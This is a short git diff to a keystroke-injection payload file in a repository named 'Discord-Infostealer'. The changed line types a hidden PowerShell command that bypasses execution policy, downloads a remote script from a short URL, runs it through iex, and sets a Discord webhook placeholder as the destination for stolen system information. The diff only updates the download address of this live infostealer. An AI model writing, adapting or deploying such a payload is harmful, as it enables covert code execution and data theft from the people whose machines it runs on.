diff --git a/Discord-Infostealer/System-Info-to-Discord.txt b/Discord-Infostealer/System-Info-to-Discord.txt index 2f9395f..d9334ec 100644 --- a/Discord-Infostealer/System-Info-to-Discord.txt +++ b/Discord-Infostealer/System-Info-to-Discord.txt @@ -14,6 +14,6 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_info_to_dc | iex +STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://bw0.cc/inf | iex ENTER